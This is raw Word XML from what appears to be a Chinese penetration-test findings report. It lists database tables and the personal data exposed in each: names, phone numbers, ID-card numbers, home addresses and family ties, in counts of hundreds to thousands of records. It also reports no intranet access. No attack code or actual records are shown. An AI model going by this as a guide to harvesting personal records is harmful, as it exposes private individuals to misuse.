    <w:p w14:paraId="1B00BAAB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21C920E0" wp14:editId="3BFEF556">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="8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601EC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3F16B46A" wp14:editId="65142DFB">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="8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847F5F" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091721AD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t_rsxxb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773AC3C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泄露信息包括：姓名、手机号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>涉及信息数3k+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA35118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5234F077" wp14:editId="53F9EFDA">
            <wp:extent cx="5334000" cy="3091180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="9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6AAA49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36736A3E" wp14:editId="04BFA385">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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137E91" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEB8EE4" w14:textId="77777777" w:rsidR="006C5D1E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t_zdy_ygcgsq_jtcy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D59161" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>900+条姓名，家庭住址信息，家庭成员信息，于成员关系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336F3D5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46F0D45F" wp14:editId="20101D0D">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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4F1B1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25373BB7" wp14:editId="52FA939A">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="10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28FFCC" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr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71FD56A8" wp14:editId="1EF25176">
            <wp:extent cx="5334000" cy="3246755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="10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6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A0F8D" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416350EA" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ods_lscsryb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23FFCB" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph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color w:val="auto"/>
        </w:rPr>
        <w:t>1k+条姓名，身份证号，手机号泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218DFF7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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="512BDB08" wp14:editId="1A7EA078">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1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50309" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000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  <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="06DED7EA" wp14:editId="2E0DE7F4">
            <wp:extent cx="5334000" cy="3222625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1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62574C" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BBCF15" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E04359E" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7289B1D5" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27782481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471D2089" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43760009" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20EC3210" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20494CA8" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000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目标内网成果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E8F64" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无内网成果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449FB84F" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="0"/>
          <w:szCs w:val="0"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E8564" w14:textId="77777777" w:rsidR="006C5D1E" w:rsidRDefault="006C5D1E">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006C5D1E"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B8EC" w14:textId="77777777" w:rsidR="00B20047" w:rsidRDefault="00B2004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EC66F4F" w14:textId="77777777" w:rsidR="00B20047" w:rsidRDefault="00B2004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B40C" w14:textId="77777777" w:rsidR="00B20047" w:rsidRDefault="00B20047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F06B7B7" w14:textId="77777777" w:rsidR="00B20047" w:rsidRDefault="00B20047">
      <w:pPr>
        <w:spacing w:before="0"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265A4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="473265A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6112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EzYTc3NWY5NTUzNjZjMDFmY2M0YzhmNDE2NGM3MWYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B034FB"/>
    <w:rsid w:val="00031C5D"/>
    <w:rsid w:val="001055A6"/>
    <w:rsid w:val="001304E5"/>
    <w:rsid w:val="00161EBC"/>
    <w:rsid w:val="0019367F"/>
    <w:rsid w:val="00211069"/>
    <w:rsid w:val="00270550"/>
    <w:rsid w:val="002735B0"/>
    <w:rsid w:val="00275285"/>
    <w:rsid w:val="00286EAC"/>
    <w:rsid w:val="002921BE"/>
    <w:rsid w:val="00347FDC"/>
    <w:rsid w:val="00366FA8"/>
    <w:rsid w:val="00384B8D"/>
    <w:rsid w:val="003A4396"/>
    <w:rsid w:val="003A7A54"/>
    <w:rsid w:val="003D6FE0"/>
    <w:rsid w:val="003F3ED8"/>
    <w:rsid w:val="00412B60"/>
    <w:rsid w:val="00444384"/>
    <w:rsid w:val="005033B7"/>
    <w:rsid w:val="00610B99"/>
    <w:rsid w:val="006543E7"/>
    <w:rsid w:val="006626DB"/>
    <w:rsid w:val="00683742"/>
    <w:rsid w:val="0069219A"/>
    <w:rsid w:val="006B5119"/>
    <w:rsid w:val="006C5D1E"/>
    <w:rsid w:val="00742729"/>
    <w:rsid w:val="00766D67"/>
    <w:rsid w:val="00784F2C"/>
    <w:rsid w:val="00835CAF"/>
    <w:rsid w:val="008521AD"/>
    <w:rsid w:val="008574A6"/>
    <w:rsid w:val="008B6582"/>
    <w:rsid w:val="00955349"/>
    <w:rsid w:val="009956F5"/>
    <w:rsid w:val="009A02E2"/>
    <w:rsid w:val="009D43A4"/>
    <w:rsid w:val="009F1B48"/>
    <w:rsid w:val="00A3007D"/>
    <w:rsid w:val="00A55F5C"/>
    <w:rsid w:val="00A707BA"/>
    <w:rsid w:val="00A85874"/>
    <w:rsid w:val="00AD11E7"/>
    <w:rsid w:val="00B034FB"/>
    <w:rsid w:val="00B20047"/>
    <w:rsid w:val="00B26323"/>
    <w:rsid w:val="00B703CF"/>
    <w:rsid w:val="00BE1CF2"/>
    <w:rsid w:val="00C0083D"/>
    <w:rsid w:val="00C351F5"/>
    <w:rsid w:val="00CB6335"/>
    <w:rsid w:val="00CC2C59"/>
    <w:rsid w:val="00D55723"/>
    <w:rsid w:val="00DB00E8"/>
    <w:rsid w:val="00DE7A69"/>
    <w:rsid w:val="00DF52F1"/>
    <w:rsid w:val="00E164B3"/>
    <w:rsid w:val="00E56D95"/>
    <w:rsid w:val="00E70575"/>
    <w:rsid w:val="00EA1008"/>
    <w:rsid w:val="00EE42CB"/>
    <w:rsid w:val="00F0226F"/>
    <w:rsid w:val="00F072F0"/>
    <w:rsid w:val="00F21491"/>
    <w:rsid w:val="00F50AF3"/>
    <w:rsid w:val="00FA0D9A"/>
    <w:rsid w:val="00FD4F48"/>
    <w:rsid w:val="01734584"/>
    <w:rsid w:val="01A249C3"/>
    <w:rsid w:val="01CF7782"/>
    <w:rsid w:val="02104022"/>
    <w:rsid w:val="022E3435"/>
    <w:rsid w:val="02A11E39"/>
    <w:rsid w:val="02EF1E8A"/>
    <w:rsid w:val="036F2FCB"/>
    <w:rsid w:val="040A2CF3"/>
    <w:rsid w:val="04AC0C9F"/>
    <w:rsid w:val="04F25C61"/>
    <w:rsid w:val="05045994"/>
    <w:rsid w:val="054F4E62"/>
    <w:rsid w:val="05FE0636"/>
    <w:rsid w:val="06347C94"/>
    <w:rsid w:val="06922615"/>
    <w:rsid w:val="06B07B82"/>
    <w:rsid w:val="06B73250"/>
    <w:rsid w:val="06C25303"/>
    <w:rsid w:val="06DC0977"/>
    <w:rsid w:val="072B7208"/>
    <w:rsid w:val="07E06245"/>
    <w:rsid w:val="088A4F5C"/>
    <w:rsid w:val="09102B5A"/>
    <w:rsid w:val="09304FAA"/>
    <w:rsid w:val="09453A7A"/>
    <w:rsid w:val="09536212"/>
    <w:rsid w:val="09802A0D"/>
    <w:rsid w:val="0A6C03E9"/>
    <w:rsid w:val="0AA95014"/>
    <w:rsid w:val="0AB30893"/>
    <w:rsid w:val="0BE6281C"/>
    <w:rsid w:val="0BE81B6C"/>
    <w:rsid w:val="0C403173"/>
    <w:rsid w:val="0C450D6C"/>
    <w:rsid w:val="0C913FB2"/>
    <w:rsid w:val="0CB85E57"/>
    <w:rsid w:val="0CC150FC"/>
    <w:rsid w:val="0CCD0DC7"/>
    <w:rsid w:val="0D156991"/>
    <w:rsid w:val="0D6B71B3"/>
    <w:rsid w:val="0E0242BB"/>
    <w:rsid w:val="0E213113"/>
    <w:rsid w:val="0E5B4877"/>
    <w:rsid w:val="0E92781D"/>
    <w:rsid w:val="0F2C744C"/>
    <w:rsid w:val="0F44355D"/>
    <w:rsid w:val="0F5F0397"/>
    <w:rsid w:val="0F6E5BFA"/>
    <w:rsid w:val="0F931DEF"/>
    <w:rsid w:val="11066490"/>
    <w:rsid w:val="11131439"/>
    <w:rsid w:val="1127475F"/>
    <w:rsid w:val="115A26D4"/>
    <w:rsid w:val="120C1C8C"/>
    <w:rsid w:val="123E4294"/>
    <w:rsid w:val="14333D94"/>
    <w:rsid w:val="14A5684C"/>
    <w:rsid w:val="14AC0E34"/>
    <w:rsid w:val="14E37374"/>
    <w:rsid w:val="14EA0703"/>
    <w:rsid w:val="15335480"/>
    <w:rsid w:val="1537044B"/>
    <w:rsid w:val="15A9236C"/>
    <w:rsid w:val="165247B2"/>
    <w:rsid w:val="166560CF"/>
    <w:rsid w:val="16911975"/>
    <w:rsid w:val="16F45869"/>
    <w:rsid w:val="17125CEF"/>
    <w:rsid w:val="17732C32"/>
    <w:rsid w:val="17F100D6"/>
    <w:rsid w:val="18BC4164"/>
    <w:rsid w:val="195B1BCF"/>
    <w:rsid w:val="1A4B1C44"/>
    <w:rsid w:val="1A815666"/>
    <w:rsid w:val="1B063DBD"/>
    <w:rsid w:val="1B7C407F"/>
    <w:rsid w:val="1BF34341"/>
    <w:rsid w:val="1BFE2CE6"/>
    <w:rsid w:val="1C16002F"/>
    <w:rsid w:val="1C632B49"/>
    <w:rsid w:val="1DE1641B"/>
    <w:rsid w:val="1E177091"/>
    <w:rsid w:val="1E29229C"/>
    <w:rsid w:val="1E537319"/>
    <w:rsid w:val="1EC04283"/>
    <w:rsid w:val="1ED61CF8"/>
    <w:rsid w:val="1F08701F"/>
    <w:rsid w:val="1FB42039"/>
    <w:rsid w:val="1FCD30FB"/>
    <w:rsid w:val="200F54C2"/>
    <w:rsid w:val="202E2489"/>
    <w:rsid w:val="206D21E8"/>
    <w:rsid w:val="20823EE5"/>
    <w:rsid w:val="20A26336"/>
    <w:rsid w:val="20DB13AE"/>
    <w:rsid w:val="2125529C"/>
    <w:rsid w:val="21655C3F"/>
    <w:rsid w:val="219A700D"/>
    <w:rsid w:val="22535AF3"/>
    <w:rsid w:val="229E2B2D"/>
    <w:rsid w:val="22B20854"/>
    <w:rsid w:val="231A0405"/>
    <w:rsid w:val="23FC3FAF"/>
    <w:rsid w:val="242502D3"/>
    <w:rsid w:val="24867A64"/>
    <w:rsid w:val="251B66B7"/>
    <w:rsid w:val="2560231B"/>
    <w:rsid w:val="25695674"/>
    <w:rsid w:val="25705460"/>
    <w:rsid w:val="259F1096"/>
    <w:rsid w:val="263976F1"/>
    <w:rsid w:val="26A821CC"/>
    <w:rsid w:val="26B26BA7"/>
    <w:rsid w:val="26D27249"/>
    <w:rsid w:val="27270F42"/>
    <w:rsid w:val="28153891"/>
    <w:rsid w:val="28445F24"/>
    <w:rsid w:val="29F23E8A"/>
    <w:rsid w:val="2A7B5724"/>
    <w:rsid w:val="2BA70CA4"/>
    <w:rsid w:val="2C504E98"/>
    <w:rsid w:val="2C526E62"/>
    <w:rsid w:val="2CEF2903"/>
    <w:rsid w:val="2D500BCC"/>
    <w:rsid w:val="2D6C52E7"/>
    <w:rsid w:val="2ECB2EFB"/>
    <w:rsid w:val="2F656EAC"/>
    <w:rsid w:val="2F835584"/>
    <w:rsid w:val="2F8C268B"/>
    <w:rsid w:val="2FCF07C9"/>
    <w:rsid w:val="30465D29"/>
    <w:rsid w:val="30711881"/>
    <w:rsid w:val="30A43A04"/>
    <w:rsid w:val="30B91F68"/>
    <w:rsid w:val="30ED53AB"/>
    <w:rsid w:val="317653A0"/>
    <w:rsid w:val="31DD469C"/>
    <w:rsid w:val="32081D91"/>
    <w:rsid w:val="33150BE9"/>
    <w:rsid w:val="33323549"/>
    <w:rsid w:val="3351049D"/>
    <w:rsid w:val="336B6A5B"/>
    <w:rsid w:val="3375712E"/>
    <w:rsid w:val="34003E18"/>
    <w:rsid w:val="354C01C6"/>
    <w:rsid w:val="3566572C"/>
    <w:rsid w:val="375004A1"/>
    <w:rsid w:val="376D2DA2"/>
    <w:rsid w:val="378105FB"/>
    <w:rsid w:val="379A27D6"/>
    <w:rsid w:val="37BE06F7"/>
    <w:rsid w:val="38107BD1"/>
    <w:rsid w:val="39036077"/>
    <w:rsid w:val="397C24A0"/>
    <w:rsid w:val="398268AC"/>
    <w:rsid w:val="3A284D77"/>
    <w:rsid w:val="3A3951BD"/>
    <w:rsid w:val="3A772E23"/>
    <w:rsid w:val="3AE830A7"/>
    <w:rsid w:val="3AFF18AD"/>
    <w:rsid w:val="3B3360B0"/>
    <w:rsid w:val="3B3E3A70"/>
    <w:rsid w:val="3B471B5C"/>
    <w:rsid w:val="3C7050E2"/>
    <w:rsid w:val="3C7626F9"/>
    <w:rsid w:val="3C940DD1"/>
    <w:rsid w:val="3C986A4D"/>
    <w:rsid w:val="3D6709BE"/>
    <w:rsid w:val="3D801355"/>
    <w:rsid w:val="3D8B21D4"/>
    <w:rsid w:val="3E315B6C"/>
    <w:rsid w:val="40212FAA"/>
    <w:rsid w:val="403C2E65"/>
    <w:rsid w:val="41B15F81"/>
    <w:rsid w:val="42553165"/>
    <w:rsid w:val="42986C86"/>
    <w:rsid w:val="42B51AA1"/>
    <w:rsid w:val="430D368B"/>
    <w:rsid w:val="430F5FF8"/>
    <w:rsid w:val="4427077C"/>
    <w:rsid w:val="447E5FD3"/>
    <w:rsid w:val="4497145E"/>
    <w:rsid w:val="450D1720"/>
    <w:rsid w:val="45235A92"/>
    <w:rsid w:val="45723C79"/>
    <w:rsid w:val="45B63B66"/>
    <w:rsid w:val="45F20F35"/>
    <w:rsid w:val="45F5124B"/>
    <w:rsid w:val="462D72F1"/>
    <w:rsid w:val="46405B25"/>
    <w:rsid w:val="465515D1"/>
    <w:rsid w:val="46AB11F1"/>
    <w:rsid w:val="472B0583"/>
    <w:rsid w:val="472E0622"/>
    <w:rsid w:val="476F66C2"/>
    <w:rsid w:val="48194880"/>
    <w:rsid w:val="481E7D9D"/>
    <w:rsid w:val="48621D83"/>
    <w:rsid w:val="489363E0"/>
    <w:rsid w:val="48952158"/>
    <w:rsid w:val="48B545A9"/>
    <w:rsid w:val="4A3459A1"/>
    <w:rsid w:val="4A3830FF"/>
    <w:rsid w:val="4A446641"/>
    <w:rsid w:val="4B7324F9"/>
    <w:rsid w:val="4B9D5464"/>
    <w:rsid w:val="4BB004C3"/>
    <w:rsid w:val="4BB36196"/>
    <w:rsid w:val="4BB70638"/>
    <w:rsid w:val="4BD872A6"/>
    <w:rsid w:val="4BF36C55"/>
    <w:rsid w:val="4D2B308B"/>
    <w:rsid w:val="4D3D2DBF"/>
    <w:rsid w:val="4DC9722A"/>
    <w:rsid w:val="4E5F0CD6"/>
    <w:rsid w:val="4ED27537"/>
    <w:rsid w:val="4EE01C53"/>
    <w:rsid w:val="501A73E7"/>
    <w:rsid w:val="50707007"/>
    <w:rsid w:val="50812371"/>
    <w:rsid w:val="508B20AE"/>
    <w:rsid w:val="50E83041"/>
    <w:rsid w:val="50F20CD3"/>
    <w:rsid w:val="51656544"/>
    <w:rsid w:val="52546BE0"/>
    <w:rsid w:val="52E02222"/>
    <w:rsid w:val="53860F02"/>
    <w:rsid w:val="53C2401E"/>
    <w:rsid w:val="53F64C50"/>
    <w:rsid w:val="53FF0DCE"/>
    <w:rsid w:val="541720E1"/>
    <w:rsid w:val="5444685B"/>
    <w:rsid w:val="548B08B3"/>
    <w:rsid w:val="548C5A08"/>
    <w:rsid w:val="55384597"/>
    <w:rsid w:val="5579126C"/>
    <w:rsid w:val="559C79A6"/>
    <w:rsid w:val="55B24C7B"/>
    <w:rsid w:val="561F201B"/>
    <w:rsid w:val="56257E75"/>
    <w:rsid w:val="568832FC"/>
    <w:rsid w:val="570D3802"/>
    <w:rsid w:val="5730129E"/>
    <w:rsid w:val="578735B4"/>
    <w:rsid w:val="57A53A3A"/>
    <w:rsid w:val="59DF7304"/>
    <w:rsid w:val="5A64198B"/>
    <w:rsid w:val="5AF736BA"/>
    <w:rsid w:val="5B21162A"/>
    <w:rsid w:val="5B767BC7"/>
    <w:rsid w:val="5C3B2BBF"/>
    <w:rsid w:val="5CB36BF9"/>
    <w:rsid w:val="5D096819"/>
    <w:rsid w:val="5DFB4112"/>
    <w:rsid w:val="5E0F60B1"/>
    <w:rsid w:val="5ED56E00"/>
    <w:rsid w:val="5EFE3224"/>
    <w:rsid w:val="5F533870"/>
    <w:rsid w:val="5FE84E0C"/>
    <w:rsid w:val="60215D53"/>
    <w:rsid w:val="61665CE8"/>
    <w:rsid w:val="62344B5E"/>
    <w:rsid w:val="628C5F22"/>
    <w:rsid w:val="62B716E9"/>
    <w:rsid w:val="62CC27C3"/>
    <w:rsid w:val="63471E49"/>
    <w:rsid w:val="637E5499"/>
    <w:rsid w:val="65270184"/>
    <w:rsid w:val="652C579B"/>
    <w:rsid w:val="65A5435B"/>
    <w:rsid w:val="65A64EE1"/>
    <w:rsid w:val="65F30067"/>
    <w:rsid w:val="66FD73EF"/>
    <w:rsid w:val="674212A6"/>
    <w:rsid w:val="68843E9D"/>
    <w:rsid w:val="68EC771B"/>
    <w:rsid w:val="69282A43"/>
    <w:rsid w:val="69642093"/>
    <w:rsid w:val="698D2452"/>
    <w:rsid w:val="69FD7706"/>
    <w:rsid w:val="6A4946F9"/>
    <w:rsid w:val="6AC65D4A"/>
    <w:rsid w:val="6ADC37BF"/>
    <w:rsid w:val="6B5A1362"/>
    <w:rsid w:val="6B8B69BC"/>
    <w:rsid w:val="6BEE5558"/>
    <w:rsid w:val="6C21592D"/>
    <w:rsid w:val="6D194857"/>
    <w:rsid w:val="6D6F091A"/>
    <w:rsid w:val="6D7777CF"/>
    <w:rsid w:val="6DD342D2"/>
    <w:rsid w:val="6DDA2238"/>
    <w:rsid w:val="6DEC1F6B"/>
    <w:rsid w:val="6ECC76A7"/>
    <w:rsid w:val="6EDA5EDF"/>
    <w:rsid w:val="6F6A346B"/>
    <w:rsid w:val="700616B2"/>
    <w:rsid w:val="70453BB5"/>
    <w:rsid w:val="70612ACB"/>
    <w:rsid w:val="70801449"/>
    <w:rsid w:val="71BE3C1E"/>
    <w:rsid w:val="72207EB6"/>
    <w:rsid w:val="72750781"/>
    <w:rsid w:val="72A55860"/>
    <w:rsid w:val="733E5017"/>
    <w:rsid w:val="7343262D"/>
    <w:rsid w:val="739E1F99"/>
    <w:rsid w:val="741D2E7E"/>
    <w:rsid w:val="743D56C4"/>
    <w:rsid w:val="74784D7E"/>
    <w:rsid w:val="74EC0AA3"/>
    <w:rsid w:val="74FD4A5E"/>
    <w:rsid w:val="75160B9B"/>
    <w:rsid w:val="75383CE8"/>
    <w:rsid w:val="75BB65A0"/>
    <w:rsid w:val="76342701"/>
    <w:rsid w:val="76650B0D"/>
    <w:rsid w:val="766F3739"/>
    <w:rsid w:val="76E934EC"/>
    <w:rsid w:val="778D031B"/>
    <w:rsid w:val="77B91110"/>
    <w:rsid w:val="77D9614F"/>
    <w:rsid w:val="77EB3293"/>
    <w:rsid w:val="78160310"/>
    <w:rsid w:val="78DA7590"/>
    <w:rsid w:val="78FE2B52"/>
    <w:rsid w:val="792B7DEB"/>
    <w:rsid w:val="799F326C"/>
    <w:rsid w:val="7A3F3DA0"/>
    <w:rsid w:val="7A6064D2"/>
    <w:rsid w:val="7B11461A"/>
    <w:rsid w:val="7B715D2D"/>
    <w:rsid w:val="7BA50A03"/>
    <w:rsid w:val="7BAE0860"/>
    <w:rsid w:val="7BB0282A"/>
    <w:rsid w:val="7C6B49A3"/>
    <w:rsid w:val="7C961A20"/>
    <w:rsid w:val="7DC425BD"/>
    <w:rsid w:val="7E152E18"/>
    <w:rsid w:val="7E631DD5"/>
    <w:rsid w:val="7E9D7B39"/>
    <w:rsid w:val="7F2257ED"/>
    <w:rsid w:val="7F4219EB"/>
    <w:rsid w:val="7F60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CF73"/>
  <w15:docId w15:val="{06ED62EA-9263-4AAA-97F4-24089D24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Theme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme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5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a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9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a">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a4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正文文本 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="a1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uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18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ImportTok">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimChar">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="SourceCode"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/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VariableTok">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="19177C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KeywordTok">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
